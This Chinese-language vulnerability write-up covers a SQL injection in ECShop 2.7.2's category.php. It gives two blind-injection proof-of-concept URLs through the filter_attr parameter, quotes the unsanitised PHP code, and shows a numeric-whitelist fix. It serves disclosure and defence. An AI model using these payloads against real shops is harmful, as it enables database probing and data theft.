ecshop /category.php SQL Injection Vul

catalog

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

 

1. 漏洞描述

Relevant Link:

http://sebug.net/vuldb/ssvid-19574

2. 漏洞触发条件

0x1: POC

http://localhost/ecshop2.7.2/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2
http://localhost/ecshop2.7.2/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=145%20or%201=2  

3. 漏洞影响范围
4. 漏洞代码分析

/category.php

..
$filter_attr_str = isset($_REQUEST['filter_attr']) ? trim($_REQUEST['filter_attr']) : '0';
//变量 $filter_attr_str 是以“.” 分开的数组
$filter_attr = empty($filter_attr_str) ? '' : explode('.', trim($filter_attr_str));
..
 /* 扩展商品查询条件 */
if (!empty($filter_attr))
{
    $ext_sql = "SELECT DISTINCT(b.goods_id) FROM " . $ecs->table('goods_attr') . " AS a, " . $ecs->table('goods_attr') . " AS b " .  "WHERE "; 
    $ext_group_goods = array();

    foreach ($filter_attr AS $k => $v)                      // 查出符合所有筛选属性条件的商品id */
    {
    if ($v != 0) 
    {
        //$v 没有作任何处理就加入了SQL查询，造成SQL注入
        $sql = $ext_sql . "b.attr_value = a.attr_value AND b.attr_id = " . $cat_filter_attr[$k] ." AND a.goods_attr_id = " . $v;
        ..

5. 防御方法

/category.php

..
/*对用户输入的$_REQUEST['filter_attr']进行转义  */
$filter_attr_str = isset($_REQUEST['filter_attr']) ? htmlspecialchars(trim($_REQUEST['filter_attr'])) : '0';
/* */
$filter_attr_str = trim(urldecode($filter_attr_str));
/* 敏感关键字过滤 */
$filter_attr_str = preg_match('/^[\d\.]+$/',$filter_attr_str) ? $filter_attr_str : '';
/**/
$filter_attr = empty($filter_attr_str) ? '' : explode('.', $filter_attr_str);
..
foreach ($filter_attr AS $k => $v)                      // 查出符合所有筛选属性条件的商品id */
{ 
    /* is_numeric($v) */
    if (is_numeric($v) && $v !=0 )
    { 
    ..

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved